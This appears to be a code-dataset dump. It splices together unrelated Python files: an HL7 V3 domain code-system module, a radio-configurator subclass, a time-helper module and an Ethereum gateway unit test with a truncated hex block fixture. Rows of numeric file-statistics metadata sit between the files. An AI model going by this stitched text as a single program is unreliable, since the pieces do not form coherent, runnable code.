emergency medical services
Description: Represents the HL7 content "domain" that supports Emergency Medical Services.
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ii = CodeSystemConcept(
{
"code": "II",
"definition": 'Description: Represents the HL7 content "domain" that supports imaging integration - and is "comprises the models, implementation guides, sample documents and images that are needed to illustrate the transformation of DICOM structured reports to CDA Release 2 as well as the creation of CDA diagnostic imaging reports."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "imaging integration",
}
)
"""
imaging integration
Description: Represents the HL7 content "domain" that supports imaging integration - and is "comprises the models, implementation guides, sample documents and images that are needed to illustrate the transformation of DICOM structured reports to CDA Release 2 as well as the creation of CDA diagnostic imaging reports."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
iz = CodeSystemConcept(
{
"code": "IZ",
"definition": 'Description: Represents the HL7 content "domain" that supports immunization - and "describes communication of information about immunization: the administration of vaccines (and/or antisera) to individuals to prevent infectious disease."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "immunization",
}
)
"""
immunization
Description: Represents the HL7 content "domain" that supports immunization - and "describes communication of information about immunization: the administration of vaccines (and/or antisera) to individuals to prevent infectious disease."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
lb = CodeSystemConcept(
{
"code": "LB",
"definition": 'Description: Represents the HL7 content "domain" that supports clinical laboratory functions - and is "comprises the models, messages, and other artifacts that are needed to support messaging related to laboratory tests or observations. "\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "laboratory",
}
)
"""
laboratory
Description: Represents the HL7 content "domain" that supports clinical laboratory functions - and is "comprises the models, messages, and other artifacts that are needed to support messaging related to laboratory tests or observations. "
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
me = CodeSystemConcept(
{
"code": "ME",
"definition": 'Description: Represents the HL7 content "domain" that supports medication - and "deals with the description of a medicine for the purposes of messaging information about medicines" and the applications of these descriptions.\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "medication",
}
)
"""
medication
Description: Represents the HL7 content "domain" that supports medication - and "deals with the description of a medicine for the purposes of messaging information about medicines" and the applications of these descriptions.
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
mi = CodeSystemConcept(
{
"code": "MI",
"definition": 'Description: Represents the HL7 content "domain" that supports master file infrastructure - and is "comprises the classes and attributes needed to support Master Files and Registries."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "masterfile infrastructure",
}
)
"""
masterfile infrastructure
Description: Represents the HL7 content "domain" that supports master file infrastructure - and is "comprises the classes and attributes needed to support Master Files and Registries."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
mm = CodeSystemConcept(
{
"code": "MM",
"definition": 'Description: Represents the HL7 content "domain" that supports Materials Management - and is "supports the simple scenario of a Materials Management application sending requests, notifications and queries to an auxiliary application. The intent is to establish a standard for the minimum functionality that is useful and comprehensive enough to explore the important concepts relative to inventory management."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "materials management",
}
)
"""
materials management
Description: Represents the HL7 content "domain" that supports Materials Management - and is "supports the simple scenario of a Materials Management application sending requests, notifications and queries to an auxiliary application. The intent is to establish a standard for the minimum functionality that is useful and comprehensive enough to explore the important concepts relative to inventory management."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
mr = CodeSystemConcept(
{
"code": "MR",
"definition": 'Description: Represents the HL7 content "domain" that supports medical records - and is "supports clinical document management, and document querying."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "medical records",
}
)
"""
medical records
Description: Represents the HL7 content "domain" that supports medical records - and is "supports clinical document management, and document querying."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
mt = CodeSystemConcept(
{
"code": "MT",
"definition": 'Description: Represents the HL7 content "domain" that supports shared messages - and "are a work product produced for expressing common, useful and reusable message types."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "shared messages",
}
)
"""
shared messages
Description: Represents the HL7 content "domain" that supports shared messages - and "are a work product produced for expressing common, useful and reusable message types."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ob = CodeSystemConcept(
{
"code": "OB",
"definition": 'Description: Represents the HL7 content "domain" that supports observations - and is "comprises the models, messages, and other artifacts that are needed to support messaging related to resulting basic healthcare diagnostic services. "\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "observations",
}
)
"""
observations
Description: Represents the HL7 content "domain" that supports observations - and is "comprises the models, messages, and other artifacts that are needed to support messaging related to resulting basic healthcare diagnostic services. "
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
oo = CodeSystemConcept(
{
"code": "OO",
"definition": 'Description: Represents the HL7 content "domain" that supports orders and observations - and will provide over-arching support information for the "Orders" (OR) and "Observations" (OB) domains.\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "orders & observations",
}
)
"""
orders & observations
Description: Represents the HL7 content "domain" that supports orders and observations - and will provide over-arching support information for the "Orders" (OR) and "Observations" (OB) domains.
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
or_ = CodeSystemConcept(
{
"code": "OR",
"definition": 'Description: Represents the HL7 content "domain" that supports orders - and "comprises the models, messages, and other artifacts that are needed to support messaging related to ordering basic healthcare services."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "orders",
}
)
"""
orders
Description: Represents the HL7 content "domain" that supports orders - and "comprises the models, messages, and other artifacts that are needed to support messaging related to ordering basic healthcare services."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
pa = CodeSystemConcept(
{
"code": "PA",
"definition": 'Description: Represents the HL7 content "domain" that supports Patient Administration - and "defines person and patient demographics and visit information about patients"\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "patient administration",
}
)
"""
patient administration
Description: Represents the HL7 content "domain" that supports Patient Administration - and "defines person and patient demographics and visit information about patients"
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
pc = CodeSystemConcept(
{
"code": "PC",
"definition": 'Description: Represents the HL7 content "domain" that supports Care Provision - and "addresses the information that is needed for the ongoing care of individuals, populations, and other targets of care."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "care provision",
}
)
"""
care provision
Description: Represents the HL7 content "domain" that supports Care Provision - and "addresses the information that is needed for the ongoing care of individuals, populations, and other targets of care."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ph = CodeSystemConcept(
{
"code": "PH",
"definition": 'Description: Represents the HL7 content "domain" that supports public health - and is "the source of a number of Common Model Element Types (CMET) designed to meet the needs of public health data exchange."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "public health",
}
)
"""
public health
Description: Represents the HL7 content "domain" that supports public health - and is "the source of a number of Common Model Element Types (CMET) designed to meet the needs of public health data exchange."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
pm = CodeSystemConcept(
{
"code": "PM",
"definition": 'Description: Represents the HL7 content "domain" that supports Personnel Management - and "spans a variety of clinical-administrative information functions associated with the organizations, individuals, animals and devices involved in the delivery and support of healthcare services."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "personnel management",
}
)
"""
personnel management
Description: Represents the HL7 content "domain" that supports Personnel Management - and "spans a variety of clinical-administrative information functions associated with the organizations, individuals, animals and devices involved in the delivery and support of healthcare services."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
qi = CodeSystemConcept(
{
"code": "QI",
"definition": 'Description: Represents the HL7 content "domain" that supports query infrastructure - and "specifies the formation of information queries and the responses to these queries to meet the needs of healthcare applications using the HL7 version 3 messaging standard."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "query infrastructure",
}
)
"""
query infrastructure
Description: Represents the HL7 content "domain" that supports query infrastructure - and "specifies the formation of information queries and the responses to these queries to meet the needs of healthcare applications using the HL7 version 3 messaging standard."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
qm = CodeSystemConcept(
{
"code": "QM",
"definition": 'Description: Represents the HL7 content "domain" that supports Quality Measures - and "is a standard for representing a health quality measure as an electronic document."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "quality measures",
}
)
"""
quality measures
Description: Represents the HL7 content "domain" that supports Quality Measures - and "is a standard for representing a health quality measure as an electronic document."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
rg = CodeSystemConcept(
{
"code": "RG",
"definition": 'Description: Represents the HL7 content "domain" that supports Registries - and "collects HL7 artifacts for administrative registries."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "registries",
}
)
"""
registries
Description: Represents the HL7 content "domain" that supports Registries - and "collects HL7 artifacts for administrative registries."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
ri = CodeSystemConcept(
{
"code": "RI",
"definition": 'Description: Represents the HL7 content "domain" that supports Informative Public Health.\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "informative public health",
}
)
"""
informative public health
Description: Represents the HL7 content "domain" that supports Informative Public Health.
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
rp = CodeSystemConcept(
{
"code": "RP",
"definition": 'Description: Represents the HL7 content "domain" that supports Regulated Products - and "includes standards developed as part of the family of messages targeted for the exchange of information about regulated products and the exchange of the data needed to provide approval for such products."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "regulated products",
}
)
"""
regulated products
Description: Represents the HL7 content "domain" that supports Regulated Products - and "includes standards developed as part of the family of messages targeted for the exchange of information about regulated products and the exchange of the data needed to provide approval for such products."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
rr = CodeSystemConcept(
{
"code": "RR",
"definition": 'Description: Represents the HL7 content "domain" that supports Public Health Reporting - and "includes messages and documents that are specifically designed to support managment, reporting and investigation in the public health context."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "public health reporting",
}
)
"""
public health reporting
Description: Represents the HL7 content "domain" that supports Public Health Reporting - and "includes messages and documents that are specifically designed to support managment, reporting and investigation in the public health context."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
rt = CodeSystemConcept(
{
"code": "RT",
"definition": 'Description: Represents the HL7 content "domain" that supports Regulated Studies - and is "includes standards developed as part of the family of messages targeted for the exchange of information about the conduct of regulated studies, and the exchange of the data collected during those studies."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "regulated studies",
}
)
"""
regulated studies
Description: Represents the HL7 content "domain" that supports Regulated Studies - and is "includes standards developed as part of the family of messages targeted for the exchange of information about the conduct of regulated studies, and the exchange of the data collected during those studies."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
rx = CodeSystemConcept(
{
"code": "RX",
"definition": 'Description: Represents the HL7 content "domain" that supports pharmacy - and is a "model used to derive message patterns to describe and communicate processes related to medication."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "pharmacy",
}
)
"""
pharmacy
Description: Represents the HL7 content "domain" that supports pharmacy - and is a "model used to derive message patterns to describe and communicate processes related to medication."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
sc = CodeSystemConcept(
{
"code": "SC",
"definition": 'Description: Represents the HL7 content "domain" that supports Scheduling - and "offers a generic set of messages and behavior to implement any number of Scheduling scenarios."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "scheduling",
}
)
"""
scheduling
Description: Represents the HL7 content "domain" that supports Scheduling - and "offers a generic set of messages and behavior to implement any number of Scheduling scenarios."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
sp = CodeSystemConcept(
{
"code": "SP",
"definition": 'Description: Represents the HL7 content "domain" that supports Specimen - and "comprises the models and artifacts that are needed to support the creation of messaging related to specimen."\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "specimen",
}
)
"""
specimen
Description: Represents the HL7 content "domain" that supports Specimen - and "comprises the models and artifacts that are needed to support the creation of messaging related to specimen."
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
td = CodeSystemConcept(
{
"code": "TD",
"definition": 'Description: Represents the HL7 content "domain" that supports Therapeutic Devices - and is "comprises the models, messages, and other artifacts that are needed to support messaging related to therapy delivery and observations made by a medical device. "\r\n\n \n UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.',
"display": "therapeutic devices",
}
)
"""
therapeutic devices
Description: Represents the HL7 content "domain" that supports Therapeutic Devices - and is "comprises the models, messages, and other artifacts that are needed to support messaging related to therapy delivery and observations made by a medical device. "
UsageNote: V3 Specifications are published in a set of "domains", which contain interactions and related specifications for a single area of health care within which can be supported by a single, coherent set of interoperability specifications.
"""
class Meta:
resource = _resource
| 72.344428
| 815
| 0.697319
| 5,985
| 49,990
| 5.822055
| 0.071178
| 0.022672
| 0.056479
| 0.063539
| 0.926474
| 0.92481
| 0.92481
| 0.92481
| 0.924523
| 0.910059
| 0
| 0.00529
| 0.25121
| 49,990
| 690
| 816
| 72.449275
| 0.925598
| 0.004481
| 0
| 0
| 0
| 0.139073
| 0.810216
| 0.002524
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013245
| 0
| 0.15894
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9d35eea637b4e5c49c1bf3da4dc08a685a4bba04
| 149
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/bobcat/calculators/calc_longrange.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/bobcat/calculators/calc_longrange.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 6
|
2022-01-12T18:22:08.000Z
|
2022-03-25T10:19:27.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/bobcat/calculators/calc_longrange.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from pyradioconfig.parts.ocelot.calculators.calc_longrange import CALC_longrange_ocelot
class Calc_Longrange_Bobcat(CALC_longrange_ocelot):
pass
| 37.25
| 87
| 0.879195
| 19
| 149
| 6.526316
| 0.578947
| 0.419355
| 0.306452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073826
| 149
| 4
| 88
| 37.25
| 0.898551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
19b469b333f78863134194fa2dce493c51836225
| 469
|
py
|
Python
|
pyprocessing/time.py
|
MikkMakk88/pyprocessing
|
a09965ab78f2c0209b66dd84d90892575498dc2a
|
[
"MIT"
] | null | null | null |
pyprocessing/time.py
|
MikkMakk88/pyprocessing
|
a09965ab78f2c0209b66dd84d90892575498dc2a
|
[
"MIT"
] | null | null | null |
pyprocessing/time.py
|
MikkMakk88/pyprocessing
|
a09965ab78f2c0209b66dd84d90892575498dc2a
|
[
"MIT"
] | null | null | null |
import datetime
import time
from pyprocessing import pp
def second():
return datetime.datetime.now().second
def minute():
return datetime.datetime.now().minute
def hour():
return datetime.datetime.now().hour
def day():
return datetime.datetime.now().day
def month():
return datetime.datetime.now().month
def year():
return datetime.datetime.now().year
def millis():
return int((time.time_ns() - pp.start_time_ns) / 1_000_000)
| 14.212121
| 63
| 0.692964
| 64
| 469
| 5
| 0.328125
| 0.2625
| 0.4125
| 0.46875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018135
| 0.176972
| 469
| 32
| 64
| 14.65625
| 0.810881
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.411765
| true
| 0
| 0.176471
| 0.411765
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
19cfdce64872c8ec2b9e413bacfb19cfb90b7269
| 136,019
|
py
|
Python
|
test/unit/connections/eth/test_eth_connection_protocol.py
|
doubleukay/bxgateway
|
ac01fc9475c039cf4255576dd4ecd6bff6c48f69
|
[
"MIT"
] | 21
|
2019-11-06T17:37:41.000Z
|
2022-03-28T07:18:33.000Z
|
test/unit/connections/eth/test_eth_connection_protocol.py
|
doubleukay/bxgateway
|
ac01fc9475c039cf4255576dd4ecd6bff6c48f69
|
[
"MIT"
] | 4
|
2019-11-06T22:08:00.000Z
|
2021-12-08T06:20:51.000Z
|
test/unit/connections/eth/test_eth_connection_protocol.py
|
doubleukay/bxgateway
|
ac01fc9475c039cf4255576dd4ecd6bff6c48f69
|
[
"MIT"
] | 10
|
2020-08-05T15:58:16.000Z
|
2022-02-07T23:51:10.000Z
|
import time
from mock import MagicMock
import blxr_rlp as rlp
from bxcommon.utils.object_hash import Sha256Hash
from bxcommon.messages.eth.serializers.block_header import BlockHeader
from bxcommon.models.blockchain_peer_info import BlockchainPeerInfo
from bxcommon.network.ip_endpoint import IpEndpoint
from bxcommon.test_utils.abstract_test_case import AbstractTestCase
from bxcommon.constants import LOCALHOST
from bxcommon.test_utils import helpers
from bxcommon.utils import convert
from bxgateway.testing import gateway_helpers
from bxgateway.connections.eth.eth_node_connection_protocol import EthNodeConnectionProtocol
from bxgateway.messages.eth.protocol.new_block_eth_protocol_message import NewBlockEthProtocolMessage
from bxgateway.testing.mocks import mock_eth_messages
from bxgateway.testing.mocks.mock_gateway_node import MockGatewayNode
from bxcommon.utils.blockchain_utils.eth import crypto_utils
from bxgateway.utils.eth.rlpx_cipher import RLPxCipher
from bxgateway.utils.stats.gateway_bdn_performance_stats_service import gateway_bdn_performance_stats_service
def _block_with_timestamp(timestamp):
nonce = 5
header = mock_eth_messages.get_dummy_block_header(5, int(timestamp))
block = mock_eth_messages.get_dummy_block(nonce, header)
return block
class EthConnectionProtocolTest(AbstractTestCase):
def setUp(self):
opts = gateway_helpers.get_gateway_opts(
8000,
include_default_eth_args=True,
)
if opts.use_extensions:
helpers.set_extensions_parallelism()
self.node = MockGatewayNode(opts)
self.node.block_processing_service = MagicMock()
self.connection = MagicMock()
gateway_helpers.add_blockchain_peer(self.node, self.connection)
self.connection.node = self.node
self.connection.peer_ip = LOCALHOST
self.connection.peer_port = 8001
self.connection.network_num = 2
self.connection.endpoint = IpEndpoint(self.connection.peer_ip, self.connection.peer_port)
self.node.blockchain_peers.add(BlockchainPeerInfo(self.connection.peer_ip, self.connection.peer_port))
gateway_bdn_performance_stats_service.set_node(self.node)
dummy_private_key = crypto_utils.make_private_key(helpers.generate_bytearray(111))
dummy_public_key = crypto_utils.private_to_public_key(dummy_private_key)
is_handshake_initiator = True
self.rlpx_cipher = RLPxCipher(
is_handshake_initiator, dummy_private_key, dummy_public_key
)
self.sut = EthNodeConnectionProtocol(self.connection, is_handshake_initiator, self.rlpx_cipher)
def test_msg_block_success(self):
message = NewBlockEthProtocolMessage(
None,
_block_with_timestamp(
time.time() + 1 - self.node.opts.blockchain_ignore_block_interval_count * self.node.opts.blockchain_block_interval
),
10
)
message.serialize()
self.sut.msg_block(message)
self.node.block_processing_service.queue_block_for_processing.assert_called_once()
def test_msg_block_too_old(self):
message = NewBlockEthProtocolMessage(
None,
_block_with_timestamp(
time.time() - 1 - self.node.opts.blockchain_ignore_block_interval_count * self.node.opts.blockchain_block_interval
),
10
)
message.serialize()
self.sut.msg_block(message)
self.node.block_processing_service.queue_block_for_processing.assert_not_called()
def test_msg_block_in_recovery(self):
message = NewBlockEthProtocolMessage(None, _block_with_timestamp(time.time()), 10)
self.node.block_recovery_service.add_block(
message.rawbytes(), message.block_hash(), [1], []
)
self.sut.msg_block(message)
self.node.block_processing_service.queue_block_for_processing.assert_not_called()
def test_msg_block(self):
msg_block_str = "fa01000b" \
"f9fffd" \
"f9021c" \
"a0339ac0ec176c7528a12825486a79af50e9593d4f876d0535d8aa62629429e562a0ebee8e2aee4c77a4efea0f2cd04201bde4cdba5b29155dc7aafaf1899c2ac282941ad91ee08f21be3de0ba2ba6918e714da6b45836a0121fea70b58f71501b5d588e300d92115fe4e44380e3e768a3631b741839aebea03845aefb89dd66b34f0bd31b983d0dda2009c10331be6f47e8d70005f8d9c313a0f279979f439decba98430df5ece135a9cdc123d178581dcf75d53534c64e8327b9010009ea23047fb45732d7a13783ae83d836985694f0889e2024dc81b0d889fb472db0441bd948bb8bb480027b92730e3bce92285247dc8f992d00a1961110e8220c5288512062322123cc5eb198ee9162f251ab4302bd587ac60791963482ecf59953d0c156a64a8a81516453009212e8d0f65ab0659c496ecb5f8c54373348da616c006c10074b7c7695c81a16a5b21916de8465912137147c41263ce6a2988d1147c39d4a70042e40213f639c8ecb1d409f7986b021bb8832e083720a2e1bc5344799a7fb41f6c2693ea014305c6b3add1d8a03513fcf6a725eceb98344c22a24eff1a96cf969d5e08258ec658eb4668844aba7cfd9d961daf07753a2d4ea3eb687181f7f146d6eb683bbb0d783e48a4383e4896b846083907a9b486976656f6e2072752d626c6f636b636861696e2d6e6f64652d33a00ed11397c96f91753ed1fa9ac67239385b287cdd57cd7c3d3fb5bb898c58e638884bd45f329c773511f9fbc0f9013482024f8561c9f3680083056fda94601ce3bb299e4ee04218fdbcd5660d35f777760b8806f05b59d3b20000b8c4ef66f725000000000000000000000000000000000000000000000000000000031d102136000000000000000000000000000000000000000000000000000000006161ce9e00000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000002000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000c8fd44d16ef3180716b38d4405b2619b8162e02226a0cf8f7aa9878921cb651b90d806a0ca99a9cd80d31c7530d7cd697b7dd71106bea01f52a1453601d3549838d3d98431a29e432add3ab41c873bf7a0026fe701f1b9f901521f8545d964b80083030166947a250d5630b4cf539739df2c5dacb4c659f2488d880de0b6b3a7640000b8e47ff36ab5000000000000000000000000000000000000009aa89f55c54582d957c30c84a4000000000000000000000000000000000000000000000000000000000000008000000000000000000000000078c087e272535a133594fd451d4468712554941800000000000000000000000000000000000000000000000000000000608391400000000000000000000000000000000000000000000000000000000000000002000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000c8fd44d16ef3180716b38d4405b2619b8162e02225a02354841d0979df8bf1c40002c7e22b7a4a97bf7e0eee8ae20f599321db3cea20a0084ff882f0042ccabb688abebd60c8e8d134faa74503fd582a39e6b8722949f5f86e83016beb852e90edd0008252089454dfa3d824c0f4ea15e8bea178a2acab1be4c267873282d2a1831c008026a078ab9bd673b12c7eaf6d4dbb67f7ffc8d0a68811576123c9cbb0e981fc86167ba04d46a2309eb28f800c0222f0b5ac3da1b0ba82dc7748f2490800523b66ad76fbf9014c822db7852540be4000830493e0945fdcca53617f4d2b9134b29090c87d01058e27e980b8e4dd2414d400000000000000000000000055b926cbf05b9676eb2f28f6d7fd91394b4fc72e03b95dfa29ed2fbb14db7052e5b0ea2c60a3b4fddb00c98ca031bc613272699d000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000414e26ba24f2b9b83e668d9e913a091adffadceccff9400abf19a6367c02634beb30a2884aeff0bd0c4bc8842a139d6dd49747ed4285f511629966de459f3a3ff61b0000000000000000000000000000000000000000000000000000000000000025a08406089757b6e5d12338dfe6330096fd8da0e92ab523119251a12df89c15560da0032b5ede43fefba84a1cab0afe77cbd2e2d69bdd7e00705b5c7c7af8d686e0e7f8ab82058b85246139ca8082bd2c94dac17f958d2ee523a2206206994597c13d831ec780b844a9059cbb000000000000000000000000d6eb4f331a08f0406083ee488f97a76313e6d5bd0000000000000000000000000000000000000000000000000000000002faf0801ca010bc9da8a60bd29978f0836f2f8f35db812535ea331f49d456fe6750b1d1b3c4a07d84d39948732eb53db12d334977b4e11d3f288aa93b9815719f4c085810fc68f8cc820427851fc808b5008303d09094dac17f958d2ee523a2206206994597c13d831ec780b86423b872dd0000000000000000000000007549611666f9817f1404353a982b28e37d8d143d0000000000000000000000004c8cfe078a5b989cea4b330197246ced82764c6300000000000000000000000000000000000000000000000000000008b47058c025a0c20ea54ca4e7e5bacef4d7719a17b5c322a498fdbf23d301c8a7be8843016c84a0645d88e8f1f0f77d44fc0e65d3973321a54513a6a2ab5fb84c726cb980a14e2df86c08851faa3b500082520894a7efae728d2936e78bda97dc267687568dd593f3884035eeec19776400801ca02297e9487e436f0cc82d90e64d47f941f8149aee1d366127904d5a5828f0a6cea058662de1bc2fcabd119bb9f0c831a6c1f5f76617b701f70c90d6e0c9b4ad89a8f8ad8319cee6851f3305bc00830668a094a0b73e1ff0b80914ab6fe0444e65848c4c34450b80b844a